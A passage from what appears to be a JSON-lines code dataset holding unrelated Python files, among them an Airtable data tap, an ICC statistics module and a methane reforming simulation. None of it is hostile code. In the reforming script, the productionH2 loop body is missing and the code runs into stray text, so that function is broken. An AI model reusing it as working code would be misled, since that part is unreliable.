infile_test_gold = r'data/mit/gold.eng.txt'\r\n run_experiment(infile_train, infile_test_gold, params)\r\n\r\n\r\ndef run_turkish():\r\n \"\"\"Runs an experiment on Turkish data against gold standard results.\"\"\"\r\n params = Parameter()\r\n params.UseTransRules = True\r\n params.DoPruning = False\r\n params.DoCompound = False\r\n params.ExcludeUnreliable = False\r\n params.BestNCandSuffix = 150\r\n infile_train = r'data/wordlist.2010.tur.utf8.txt'\r\n infile_test_gold = r'data/mit/gold.tur.txt'\r\n run_experiment(infile_train, infile_test_gold, params)\r\n\r\n\r\ndef run_finnish():\r\n \"\"\"Runs an experiment on Finnish data against gold standard results.\"\"\"\r\n params = Parameter()\r\n params.UseTransRules = False\r\n params.DoPruning = True\r\n params.DoCompound = True\r\n params.ExcludeUnreliable = True\r\n params.BestNCandSuffix = 150\r\n infile_train = r'data/wordlist.2010.fin.utf8.txt'\r\n infile_test_gold = r'data/mit/gold.fin.txt'\r\n run_experiment(infile_train, infile_test_gold, params)\r\n\r\n\r\nif __name__ == '__main__':\r\n run_english()\r\n #run_turkish()\r\n #run_finnish()\r\n","sub_path":"coling2018.py","file_name":"coling2018.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292184518","text":"import sys\nimport unittest\nfrom io import BytesIO, TextIOWrapper\n\nfrom pov_server_page.du_diff import parse_du, main\n\n\nclass TestParseDu(unittest.TestCase):\n\n def test_parse_du(self):\n self.assertEqual(parse_du(BytesIO(b'4\\tfoo\\n50\\tbar\\n\\n')), {\n b'foo': 4,\n b'bar': 50,\n })\n\n\nclass TestMain(unittest.TestCase):\n\n def run_main(self, *args):\n orig_sys_argv = sys.argv\n orig_sys_stdout = sys.stdout\n try:\n sys.argv = ['du-diff'] + list(args)\n sys.stdout = self.stdout = TextIOWrapper(BytesIO())\n main()\n finally:\n sys.stdout = orig_sys_stdout\n sys.argv = orig_sys_argv\n\n def test_main(self):\n self.run_main('/dev/null', '/dev/null')\n","sub_path":"tests/test_du_diff.py","file_name":"test_du_diff.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"120046930","text":"from services.fields_mapping import FieldsMapping\nfrom utils.json_utils import JsonUtils, Relations\nimport requests\nimport json\nimport singer\n\n\nclass Airtable(object):\n with open('./config.json', 'r') as f:\n config = json.load(f)\n metadata_url = 
config[\"metadata_url\"]\n records_url = config[\"records_url\"]\n token = config[\"token\"]\n\n @classmethod\n def run_discovery(cls, base_id):\n headers = {'Authorization': 'Bearer {}'.format(cls.token)}\n response = requests.get(url=cls.metadata_url + base_id, headers=headers)\n schemas = []\n\n for table in response.json()[\"tables\"]:\n\n columns = {}\n schema = {\"name\": table[\"name\"],\n \"properties\": columns}\n\n columns[\"id\"] = {\"type\": [\"null\", \"string\"], 'key': True}\n\n for field in table[\"fields\"]:\n if not field[\"name\"] == \"Id\":\n columns[field[\"name\"]] = {\"type\": [\"null\", FieldsMapping.map_field(field[\"config\"])]}\n\n schemas.append(schema)\n\n with open('./services/{}_schemas.json'.format(base_id), 'w') as outfile:\n json.dump(schemas, outfile)\n\n @classmethod\n def run_tap(cls, base_id):\n\n with open('./services/{}_schemas.json'.format(base_id), 'r') as f:\n schemas = json.load(f)\n\n for schema in schemas:\n table = schema[\"name\"].replace('/', '')\n table = table.replace(' ', '')\n\n if table != 'relations':\n response = Airtable.get_response(base_id, schema[\"name\"])\n if response.json().get('records'):\n records = JsonUtils.match_record_with_keys(schema,\n response.json().get('records'))\n\n singer.write_schema(table, schema, 'id')\n singer.write_records(table, records)\n\n offset = response.json().get(\"offset\")\n\n while offset:\n response = Airtable.get_response(base_id, schema[\"name\"], offset)\n if response.json().get('records'):\n records = JsonUtils.match_record_with_keys(schema,\n response.json().get('records'))\n\n singer.write_records(table, records)\n offset = response.json().get(\"offset\")\n\n relations_table = {\"name\": \"relations\",\n \"properties\": {\"id\": {\"type\": [\"null\", \"string\"]},\n \"relation1\": {\"type\": [\"null\", \"string\"]},\n \"relation2\": {\"type\": [\"null\", \"string\"]}}}\n\n singer.write_schema('relations', relations_table, 'id')\n singer.write_records('relations', Relations.get_records())\n\n @classmethod\n def get_response(cls, base_id, table, offset=None):\n\n headers = {'Authorization': 'Bearer {}'.format(cls.token)}\n table = table.replace('/', '%2F')\n\n if offset:\n request = cls.records_url + base_id + '/' + table + '?offset={}'.format(offset)\n else:\n request = cls.records_url + base_id + '/' + table\n\n return requests.get(url=request, headers=headers)\n","sub_path":"services/airtable_api.py","file_name":"airtable_api.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"566811386","text":"\"\"\"\nShown when a user tries to access or edit something that doesn't belong to them\nor is private.\nIf the rest of the site is written correctly, this should only ever be seen if\nsomeone manually types in a URL for an item or trade, because they should never\nbe given the option to view something that's private.\n\"\"\"\n\ndef private():\n\t# See what type of item the user was trying to look at.\n item_type = request.args[0]\n\n # See if the user was trying to edit something they don't own.\n edit = request.vars.get('edit') is not None\n\n # Set an appropriate title for the page.\n if edit:\n response.title = \"That's not yours\"\n else:\n response.title = \"Private\"\n\n # Give the user the option to go somewhere else instead.\n page_actions = [\n ('Previous Page', 'javascript:history.back()', 'arrow-left'),\n ('Home', URL('default', 'index'), 'home'),\n ('Search', URL('search', 'index'), 
'search')\n ]\n\n return dict(item_type=item_type, page_actions=page_actions, edit=edit)\n\n\ndef not_found():\n # See what type of item the user was trying to look at.\n item_type = request.args[0]\n\n # Set an appropriate title for the page.\n response.title = \"Not Found\"\n\n # Give the user the option to go somewhere else instead.\n page_actions = [\n ('Previous Page', 'javascript:history.back()', 'arrow-left'),\n ('Home', URL('default', 'index'), 'home'),\n ('Search', URL('search', 'index'), 'search')\n ]\n\n return dict(item_type=item_type, page_actions=page_actions)\n","sub_path":"controllers/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221195223","text":"#! /usr/bin/python\n\nvocabulary={\n \"C\":\"a compile program language, linux was writed with it\",\n \"Python\":\"a script language, Ops used it\",\n \"javascript\":\"a script language, program dynamic web page\"\n}\n\nfor key,value in vocabulary.items():\n print(key+\":\"+value+\"\\n\")\n\n \n","sub_path":"Chapter06/ex06_03.py","file_name":"ex06_03.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276121005","text":"r\"\"\"Connecting a mouse event to a callback function\n\"\"\"\n\nfrom __future__ import print_function, absolute_import\n\n# This may be required if you are on a Mac and default to using OSX as\n# your backend\n# import matplotlib\n# matplotlib.use('qt5agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nlast_ev = None\n\n\ndef event_printer(event):\n \"\"\"Helper function for exploring events.\n \"\"\"\n global last_ev\n last_ev = event\n print('{}'.format(event.name))\n print(vars(event))\n if event.name == 'button_release_event':\n print('=' * 25)\n else:\n print('-' * 25)\n\n\nth = np.linspace(0, 2*np.pi, 64)\nfig, ax = plt.subplots()\nax.plot(th, np.sin(th), 'o-', picker=5)\n\ncids = {k: fig.canvas.mpl_connect(k, event_printer)\n for k in ('button_press_event', 'button_release_event',\n 'scroll_event', 'key_press_event', 'key_release_event',\n 'pick_event')}\n\n\nplt.show()\n","sub_path":"key/00-explore.py","file_name":"00-explore.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"564714917","text":"import sys\n\nfrom PyQt4 import QtGui\nfrom PyQt4.QtGui import QMessageBox , QIcon\n\nclass FileHandler:\n def __init__(self , window):\n self.window = window\n self.filepath = None\n\n def saveAs(self):\n newPath = QtGui.QFileDialog.getSaveFileName(self.window , 'Chose save location' , '' , '*.dpemu')\n if newPath != \"\":\n self.filepath = newPath\n f = open(self.filepath , 'w')\n f.write(self.window.etTextEditor.toPlainText())\n f.close()\n\n #normal save if we have filepath otherwise go to saveas\n def save(self):\n if self.filepath == None:\n self.saveAs()\n else:\n f = open(self.filepath , 'w')\n f.write(self.window.etTextEditor.toPlainText())\n f.close()\n\n #open file\n def open(self):\n newPath = QtGui.QFileDialog.getOpenFileName(self.window , 'Chose file to open' , '' ,\n 'Dp Emulator file (*.dpemu)')\n if newPath != '':\n self.filepath = newPath\n f = open(self.filepath)\n self.window.etTextEditor.setPlainText(f.read())\n 
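# close the handle once the contents are loaded into the editor\n            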
f.close()\n","sub_path":"dpSimFiles.py","file_name":"dpSimFiles.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"20836103","text":"#!/usr/bin/env python\n\"\"\"Genetic history reports.\n\nUsage:\n ./reporting.py --help\n ./reporting.py REPORT_TYPE GENERATIONS_FILE\n\nOptions:\n -h --help Show this help.\n REPORT_TYPE The report you want to print (possibles: values, ...)\n GENERATIONS_FILE The file containing the history of generations.\n\"\"\"\nfrom docopt import docopt\nfrom bokeh.plotting import figure, show, output_file\n\n\ndef read_generations(generations_file):\n with open(generations_file) as generations_data:\n return [eval(line)\n for line in generations_data.readlines()]\n\n\ndef values(generations):\n generation_indexes = range(len(generations))\n\n fig = figure()\n\n fig.xaxis.axis_label = 'generation'\n\n maxes = [max([value for game, value in generation])\n for generation in generations]\n mins = [min([value for game, value in generation])\n for generation in generations]\n averages = [sum([value for game, value in generation]) / len(generation)\n for generation in generations]\n\n value_groups = (\n ('max value', 'green', maxes),\n ('min value', 'red', mins),\n ('average value', 'blue', averages),\n )\n\n for name, color, values in value_groups:\n fig.line(generation_indexes, values, color=color, legend=name)\n\n output_file(\"values.html\")\n show(fig)\n\n\ndef run():\n \"\"\"Run a genetic algorithm of games.\"\"\"\n arguments = docopt(__doc__)\n\n report_type = arguments['REPORT_TYPE']\n generations_file = arguments['GENERATIONS_FILE']\n\n globals()[report_type](read_generations(generations_file))\n\nif __name__ == '__main__':\n run()\n\n\n","sub_path":"ai/reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234648175","text":"import pandas as pd\nimport os\nimport shutil\nimport numpy as np\n\n# data_try = np.array([[7,8,3,5],\n# [2,4,4,1],\n# [1,2,6,1],\n# [5,5,7,2],\n# [8,9,5,6],\n# [9,10,6,7]])\n\n# pick group1 data according to case names in the other group\ndef pick_group1_data(all_path, group2_path, group1_path):\n pick_list = os.listdir(group2_path)\n for name in pick_list:\n copy_from = os.path.join(all_path,name)\n copy_to = os.path.join(group1_path,name)\n shutil.copytree(copy_from,copy_to)\n\n\ndef compute_BMS(data):\n mean_all = np.mean(data)\n mean_subject = np.mean(data, axis=1)\n n_rater = np.shape(data)[1]\n df = np.shape(data)[0]-1\n SS_between_people = n_rater * sum(np.square(mean_subject-mean_all))\n BMS = SS_between_people/df\n return BMS\n\n\ndef compute_RMS(data):\n mean_all = np.mean(data)\n mean_subject = np.mean(data, axis=0)\n n_rater = np.shape(data)[0]\n df = np.shape(data)[1]-1\n SS_between_items = n_rater * sum(np.square(mean_subject - mean_all))\n RMS = SS_between_items/ df\n return RMS\n\n\ndef compute_EMS(data):\n df_BMS = df = np.shape(data)[0]-1\n df_RMS = df = np.shape(data)[1]-1\n df_EMS = (data.shape[0]-1) * (data.shape[1]-1)\n SS_residual = data.size * np.var(data) - compute_BMS(data)*df_BMS - compute_RMS(data)*df_RMS\n EMS = SS_residual/df_EMS\n return EMS\n\n\ndef compute_ICC2(data):\n BMS = compute_BMS(data)\n RMS = compute_RMS(data)\n EMS = compute_EMS(data)\n\n n_subject = data.shape[0]\n ICC2 = (BMS-EMS)/(BMS+(RMS-EMS)/n_subject)\n return ICC2\n\n\ndef get_feature_2data(data1_path, data2_path):\n 
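# Compute ICC(2,1) for every feature column shared by the two raters' CSV files.\n    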
group1_data = pd.read_csv(data1_path)\n group2_data = pd.read_csv(data2_path)\n feature_list = group1_data.columns.values.tolist()[1:]\n ICC_dir = {}\n for feature in feature_list:\n rater1 = np.array(group1_data[feature])\n rater2 = np.array(group2_data[feature])\n\n feature_data = np.stack((rater1,rater2),axis=1)\n feature_ICC = compute_ICC2(feature_data)\n ICC_dir[feature] = feature_ICC\n return ICC_dir\n\n\ndef get_feature_3data(data1_path, data2_path, data3_path):\n group1_data = pd.read_csv(data1_path)\n group2_data = pd.read_csv(data2_path)\n group3_data = pd.read_csv(data3_path)\n feature_list = group1_data.columns.values.tolist()[1:]\n ICC_dir = {}\n for feature in feature_list:\n rater1 = np.array(group1_data[feature])\n rater2 = np.array(group2_data[feature])\n rater3 = np.array(group3_data[feature])\n\n feature_data = np.stack((rater1,rater2,rater3),axis=1)\n feature_ICC = compute_ICC2(feature_data)\n ICC_dir[feature] = feature_ICC\n return ICC_dir\n\n\ndef get_feature_4data(data1_path, data2_path, data3_path, data4_path):\n group1_data = pd.read_csv(data1_path)\n group2_data = pd.read_csv(data2_path)\n group3_data = pd.read_csv(data3_path)\n group4_data = pd.read_csv(data4_path)\n feature_list = group1_data.columns.values.tolist()[1:]\n ICC_dir = {}\n for feature in feature_list:\n rater1 = np.array(group1_data[feature])\n rater2 = np.array(group2_data[feature])\n rater3 = np.array(group3_data[feature])\n rater4 = np.array(group4_data[feature])\n print(rater1)\n print(rater2)\n print(rater3)\n print(rater4)\n\n feature_data = np.stack((rater1,rater2,rater3,rater4),axis=1)\n feature_ICC = compute_ICC2(feature_data)\n ICC_dir[feature] = feature_ICC\n return ICC_dir\n\n\ndef save_ICC_to_csv(ICC_dir, save_csv_path, name):\n data = pd.DataFrame(ICC_dir,index=[name])\n data_trans = pd.DataFrame(data.values.T, index=data.columns, columns=data.index)\n data_trans.to_csv(save_csv_path,columns=None)\n\n\ndef compute_all_ICC(ICC_path):\n group1_path = os.path.join(ICC_path,r'group1\\all_features.csv')\n group2_path = os.path.join(ICC_path,r'group2\\all_features.csv')\n group3_path = os.path.join(ICC_path,r'group3\\all_features.csv')\n save_csv_dir = ICC_path\n\n ICC_dir_12 = get_feature_2data(group1_path, group2_path)\n ICC_dir_13 = get_feature_2data(group1_path, group3_path)\n ICC_dir_23 = get_feature_2data(group2_path, group3_path)\n ICC_dir_123 = get_feature_3data(group1_path, group2_path, group3_path)\n\n save_ICC_to_csv(ICC_dir_12, os.path.join(save_csv_dir, 'ICC12.csv'), 'ICC12')\n save_ICC_to_csv(ICC_dir_13, os.path.join(save_csv_dir, 'ICC13.csv'), 'ICC13')\n save_ICC_to_csv(ICC_dir_23, os.path.join(save_csv_dir, 'ICC23.csv'), 'ICC23')\n save_ICC_to_csv(ICC_dir_123, os.path.join(save_csv_dir, 'ICC123.csv'), 'ICC123')\n\n\ndef compute_all_ICC_try():\n group1_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group1\\all_features.csv'\n group2_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group2\\all_features.csv'\n group3_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group3\\all_features.csv'\n group4_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group4\\all_features.csv'\n save_csv_dir = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC'\n\n ICC_dir_1234 = get_feature_4data(group1_path, group2_path, group3_path, group4_path)\n\n save_ICC_to_csv(ICC_dir_1234, os.path.join(save_csv_dir, 'ICC1234.csv'), 'ICC1234')\n\n\n# print(compute_ICC2(data_try))\n\n# feature = 
'non_contrast.nii_log-sigma-1-0-mm-3D_firstorder_10Percentile'\n\n# pick_group1_data(r'F:\\SHZL\\data\\2d\\all',r'F:\\SHZL\\data\\2d\\ICC_new\\group2', r'F:\\SHZL\\data\\2d\\ICC_new\\group1')\n\n\ncompute_all_ICC(r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\2d\\new_ICC')\n\n# compute_all_ICC_try()\n\n\n","sub_path":"process/compute_ICC.py","file_name":"compute_ICC.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586762260","text":"from array import array\n\nfrom numpy import *\nfrom scipy.optimize import fsolve\nfrom matplotlib import pyplot as plt\n\nP0 = 1 #bar\nMMCH4 = 16.04\nMMH20 = 18.02\nMMCO = 28.01\nMMCO2 = 44.01\nMMH2 = 2.02\nMMO2=32\nCpProcess=2900 #[/KgK]\nCpCombustion=2900 #[j+kgK]\n\n\n# Retourn le nbr de mole de chaque element en sortie du SMR\n#\n#Rapport molaire H2O/CH4 doit etre entre 1 et 4\n#\ndef SMR(ch4, h2O, P, T):\n T_SMR = T # 22 avec 800\n K_SMR = 10 ** (-11650 / T + 13.076)\n K_WGS = 10 ** (1910 / T - 1.764)\n\n def func(p):\n X1, X2 = p\n Y = 2 * X1 + ch4 + h2O\n SMR = (X1 - X2) * (3 * X1 + X2) ** 3 * (P / P0) ** 2 - K_SMR * (ch4 - X1) * (h2O - X1 - X2) * Y ** 2\n WGS = (3 * X1 + X2) * X2 - K_WGS * (X1 - X2) * (h2O - X1 - X2)\n return SMR, WGS\n\n sol = fsolve(func, (0.3, 0.6))\n X1 = sol[0] # 0.65\n X2 = sol[1] # 0.26\n #print(\"X1: \", X1, \"\\nX2: \", X2)\n #print(\"Erreur de l'ordre de :\", func(sol))\n\n nCH_4 = ch4 - X1;\n nH_2O = h2O - X1 - X2\n nCO = X1 - X2\n nCO_2 = X2\n nH_2 = 3 * X1 + X2\n\n return array([nCH_4, nH_2O, nCO, nCO_2, nH_2])\n\n# Retourn le nbr de mole de chaque element en sortie de l'ATR\n#\n# Rapport molaire H2O/CH4=1.15 et O2/CH4=0.6\n# ATTENTION On ajoute 2* 'O2' de mole dans le système\n#\ndef ATR(CH4, H2O, O2, P, T):\n K1 = 10 ** (-11650 / T + 13.076)\n K2 = 10 ** (1910 / T - 1.764)\n\n def func(p):\n X1, X2 = p\n\n y = CH4 + H2O + O2 - X1 - X2 - O2 / 2\n y = CH4 + H2O + O2 + 2 * X1 # achill\n EQ1 = (3 * X1 + X2) ** 3 * (P / P0) ** 2 * (X1 - X2) - K1 * y ** 2 * (H2O + O2 - X1 - X2) * (CH4 - X1 - 0.3)\n EQ2 = (3 * X1 + X2) * (O2 / 2 + X2) - K2 * (X1 - X2) * (H2O + O2 - X1 - X2)\n\n return EQ1, EQ2\n\n X1, X2 = fsolve(func, (0.6, -0.04))\n #print(\"X1:\", X1, \"\\nX2:\", X2) #solution est de 0.6517,-0.0719\n #print(\"L'erreur est de: \", func([X1, X2]))\n\n return array([CH4 - X1 - O2 / 2, H2O + O2 - X1 - X2, X1 - X2, O2 / 2 + X2, 3 * X1 + X2])\n\n\n# PLOT l'évolution du circuit\ndef plot(title, ch4, h20, evolutionA):\n four = evolutionA[0]\n wgs = evolutionA[1]\n condensation = evolutionA[2]\n absortion = evolutionA[3]\n\n def getPlotX(e, index):\n a = zeros(len(evolutionA))\n for i in range(0, len(evolutionA)):\n a[i] = evolutionA[i][index]\n return a\n\n # ********GRAPH MOLAIRE*******************\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Etapes du processus (0,1,2,3,4,5)\")\n plt.ylabel(\"mole/s\")\n\n plt.plot(getPlotX(evolutionA, 0), label=\"CH4\")\n plt.plot(getPlotX(evolutionA, 1), label=\"H2O\")\n plt.plot(getPlotX(evolutionA, 2), label=\"CO\")\n plt.plot(getPlotX(evolutionA, 3), label=\"CO2\")\n plt.plot(getPlotX(evolutionA, 4), label=\"H2\")\n plt.legend()\n plt.show()\n\n # *********GRAPH MASSIQUE**************\n plt.figure()\n plt.title(title)\n plt.plot(getPlotX(evolutionA, 0) * MMCH4, label=\"CH4\")\n plt.plot(getPlotX(evolutionA, 1) * MMH20, label=\"H2O\")\n plt.plot(getPlotX(evolutionA, 2) * MMCO, label=\"CO\")\n plt.plot(getPlotX(evolutionA, 3) * MMCO2, label=\"CO2\")\n plt.plot(getPlotX(evolutionA, 4) * 
MMH2, label=\"H2\")\n plt.xlabel(\"Etapes du processus (0,1,2,3,4)\")\n plt.ylabel(\"g/s\")\n plt.legend()\n\n plt.show()\n\n\n# retour une matrice contenant ce qui reste à la sortie de chaque étape du circuit\ndef circuit(ch4, h2o, autotherme=False):\n evolution = zeros((5, 5)) #est la matrice qui va contenir les débits à chaque étapes\n masseActuelle=0\n masseProduite=0\n\n # ****************ETAT INITIAL************\n debut=array([ch4, h2o, 0, 0, 0])\n print(\"\\nAu début nous avons [CH_4,H_2O,CO,CO_2,H_2]: \",debut )\n masseActuelle=ch4*MMCH4+h2o*MMH20\n\n\n\n #\n # ***************FOUR/SMR************\n #\n vaporeformageSortie=zeros(5);\n if autotherme==False:\n vaporeformageSortie=SMR(ch4, h2o, 30, 1100)\n else:\n vaporeformageSortie=ATR(ch4, h2o, 0.6, 50, 1300)\n #Débit molaire\n print(\"A la sortie du four,nous avons [CH_4,H_2O,CO,CO_2,H_2]mole: \", vaporeformageSortie)\n #Energie\n #E=dH *dn_ch4+masse*cp*dT\n t_out_vapo=0;\n if autotherme==False:\n t_out_vapo = 1100\n masseActuelle=vaporeformageSortie[0]*MMCH4+vaporeformageSortie[1]*MMH20+vaporeformageSortie[2]*MMCO+vaporeformageSortie[3]*MMCO2+vaporeformageSortie[4]*MMH2\n energieVapo=224e3*abs(vaporeformageSortie[0]-debut[0])+CpProcess*masseActuelle*10**(-3)*(t_out_vapo-693)\n print(\" Energie du vapformage conventionnel est de : \",energieVapo,'[J]')\n\n else:\n masseActuelle=vaporeformageSortie[0]*MMCH4+vaporeformageSortie[1]*MMH20+vaporeformageSortie[2]*MMCO+vaporeformageSortie[3]*MMCO2+vaporeformageSortie[4]*MMH2+vaporeformageSortie[0]*MMCH4*3/2\n\n #\n # On ajoute 2* 'O2' dans le système comme matière.\n # CH4 + 2O2 => 2 H2O +CO2 est l'une des equations pour résoudre l'ATR\n #\n masseActuelle+=0.6*MMO2\n\n t_out_vapo = 1300\n energieVapo=-803e3*debut[0]+CpCombustion*masseActuelle*10**(-3)*(t_out_vapo-693)\n print(\" Energie du vapformage conventionnel est de : \", energieVapo, '[J]')\n print(\" Energie pour passer du vapoformage à l'oxydation est nulle\")\n\n\n #\n #*************OXYDATION*******\n #2CH_4 +O_2 => 4H_2+2CO\n #\n def oxydation(CH4,H20,CO,CO2,H2):\n return 0,H20,CO+CH4,CO2,H2+2*CH4\n #Débit molaire\n oxydationSortie=oxydation(vaporeformageSortie[0], vaporeformageSortie[1], vaporeformageSortie[2], vaporeformageSortie[3], vaporeformageSortie[4])\n print(\"A la sortie de l'oxydation, nous avons [CH_4,H_2O,CO,CO_2,H_2]mole: \",oxydationSortie)\n ajoutO2=copy(vaporeformageSortie[0]/2)\n #Energie\n\n #\n # On rajoute 02\n # 2 CH4+ O2 => 4H2 + 2CO\n #\n masseActuelle+=vaporeformageSortie[0]/2\n deltaH_oxydation_reference=247.34e3\n energieOxy=deltaH_oxydation_reference+CpProcess*masseActuelle*10**(-3)*(609.15-t_out_vapo) #609.15=336+273.15\n\n print(\" Engergie produite par l'oxydation partiel = \",energieOxy)\n print(\" Pour passé de l'oxydation partiel au watergazship nous avons une energie de :\",CpProcess*masseActuelle*10**(-3)*(570-609.15))\n\n\n #\n # ***************WATER GAZ SHIP****************\n # Retourn le nbr de mole de chaque element à la sortie du WaterGazSHip\n #\n #DEBIT MOLAIRE\n def WGS(CH4, H2O, CO, CO2, H2):\n if CO >= H2O:\n nCO = CO - H2O\n nH_2O = 0\n else:\n nH_2O = H2O - CO\n nCO = 0\n\n nCO_2 = min(CO, H2O)\n nH_2 = min(CO, H2O)\n\n return CH4, nH_2O, nCO, nCO_2 + CO2, nH_2 + H2 # ch4,H2O,nCO2,H2\n WGSSortie = array(WGS(oxydationSortie[0], oxydationSortie[1], oxydationSortie[2], oxydationSortie[3], oxydationSortie[4]))\n WGSSortie = array( WGS(vaporeformageSortie[0], vaporeformageSortie[1], vaporeformageSortie[2], vaporeformageSortie[3], vaporeformageSortie[4]))\n\n print(\"A la sortie de 
WGS,nous avons [CH_4,H_2O,CO,CO_2,H_2] mole: \", WGSSortie)\n    #ENERGIE\n    # E=dH *dn_ch4+masse*cp*dT\n    #La masse est conservé masseActuelle=oxydationSortie[0]*MMCH4+oxydationSortie[1]*MMH20+oxydationSortie[2]*MMCO+oxydationSortie[3]*MMCO2+oxydationSortie[3]*MMH2+ajoutO2*MMO2\n    energieWGS=-34e3*abs(oxydationSortie[2]-WGSSortie[2])+masseActuelle*10**(-3)*CpProcess*(480-570)\n    print(\"    Energie produite ds le WGS: \",energieWGS, \"[J]\")\n\n    print(\"    Energie pour passé du WGS à la condensation = \",CpProcess*masseActuelle*10**(-3)*(350-480))\n\n    #\n    # **************CONDENSATION DE L H2O**************\n    #\n    #Debit molaire\n    condensationSortie = copy(WGSSortie)\n    condensationSortie[1] = 0\n    H2OCondense = abs(WGSSortie[1] - condensationSortie[1])\n    print(\"A la sortie de la condensation,nous avons [CH_4,H_2O,CO,CO_2,H_2] mole: \", condensationSortie)\n    print(\"    \",H2OCondense, \" mole de H2O sont elever par condensation\")\n    masseProduite += H2OCondense * MMH20;\n    #Energie\n    print(\"    Energie de la condensation: \",2257e3*WGSSortie[1]) #dH_condensation\n    #a la sortie de la condensation\n    masseActuelle-=H2OCondense*MMH20\n\n    #\n    # ***************ABSORPTION DE CO2***********************\n    #\n    absorptionSortie = copy(condensationSortie)\n    absorptionSortie[3] = 0\n    CO2Absorbe = abs(condensationSortie[3] - absorptionSortie[3])\n    print(\"A la sortie de la absorption,nous avons [CH_4,H_2O,CO,CO_2,H_2] mole: \", absorptionSortie)\n    print(\"    \", CO2Absorbe, \" mole de CO2 sont absorbées\")\n    masseProduite += CO2Absorbe * MMCO2;\n    print(\"    Energie a l'absorption: \",0)\n    masseActuelle-=CO2Absorbe*MMCO2\n\n    return array([debut,vaporeformageSortie,oxydationSortie,WGSSortie,condensationSortie,absorptionSortie])\n\n#\n# 'h_2o' est le nombre de mole d'eau donne pour la production d'H2\n#\ndef electrolyse(h_2o,tention):\n    valence=2\n    F=96485.33 #C/mol\n    courant=F*h_2o*valence\n\n    #E[KWh]=tension[V] * courant[A] * temps[s] * 1h/3600s * 1e-3\n    E=tention*courant*1/3600 #Energie en wh\n\n    productionH2=h_2o/2\n    return productionH2,E\n\n\n\ndef productionH2(butH2,nbrDeMoleAjoute,autotherme):\n    ch4 = 0\n    n=0\n    out=0\n    while(out < butH2):\n        # NOTE: the body of this loop was lost during extraction (text between '<' and '>' was stripped);\n        # the lines below are a minimal plausible reconstruction, not the original code.\n        n += 1\n        ch4 = n * nbrDeMoleAjoute\n        evolution = circuit(ch4, 2.5 * ch4, autotherme)\n        out = evolution[5][4]\n    return ch4\n\n'''\nprint(\"Production => \",out,\" mole de H2\")\n'''\n\n\nprint(circuit(1250000,2.5*1250000,False))\nprint(\"\\n**************SMR********************************************\")\nn_ch4 = 1\nn_h2o = 2.5\nevolution = circuit(n_ch4, n_h2o, False)\n#plot(\"Circuit avec un réformeur conventionnel\", n_ch4, n_h2o, evolution)\n\nprint(\"\\n\\n**************ATR*****************************************\")\nn_ch4 = 1\nn_h2o = 1.15\nevolution = circuit(n_ch4, n_h2o, True)\n#plot(\"Circuit avec un réformeur autotherme\", n_ch4, n_h2o, evolution)\n","sub_path":"20181209circuit .py","file_name":"20181209circuit .py","file_ext":"py","file_size_in_byte":10325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"580579965","text":"#!/usr/bin/env python3\n\nimport sys\nimport click\nimport numpy as np\nimport json\nimport enum\nimport io\nimport zipfile\nimport sklearn.cluster\nimport sklearn.neighbors\nimport random\n\nfrom PySide2 import QtWidgets, QtGui, QtCore\nfrom pathlib import Path\nfrom functools import lru_cache\nfrom cached_property import cached_property\nfrom tqdm import tqdm\n\nfrom origami.batch.core.processor import Processor\nfrom origami.batch.core.io import Artifact, Stage, Input, Output\nfrom origami.batch.core.utils import Spinner\n\n\nclass Archive:\n\tdef __init__(self, path):\n\t\tself._vectors = []\n\t\tself._images = []\n\t\tself._path = path\n\n\t\tif not 
path.name.endswith(\".zip\"):\n\t\t\traise click.UsageError(\"path needs to be a zip file.\")\n\n\t\twith zipfile.ZipFile(path, \"r\") as zf:\n\t\t\tfor name in tqdm(zf.namelist(), \"loading\"):\n\t\t\t\ttry:\n\t\t\t\t\tif name.startswith(\"__MACOSX/\"):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif not name.endswith(\".signature.json\"):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tdata = json.loads(zf.read(name).decode(\"utf8\"))\n\n\t\t\t\t\tdata = np.array(data[\"grid\"])\n\n\t\t\t\t\tself._vectors.append(data.flatten())\n\t\t\t\t\tself._images.append(name.rsplit(\".\", 2)[0])\n\t\t\t\texcept UnicodeDecodeError:\n\t\t\t\t\traise\n\n\t\tself._vectors = np.array(self._vectors)\n\t\tself._tree = sklearn.neighbors.BallTree(\n\t\t\tself._vectors, leaf_size=5, metric=\"l1\")\n\n\t\tdensity_k = 5\n\t\td, i = self._tree.query(\n\t\t\tself._vectors, k=density_k, return_distance=True)\n\t\tself._density = np.mean(d[:, 1:], axis=-1)\n\n\t\tself._zf = zipfile.ZipFile(path, \"r\")\n\n\tdef 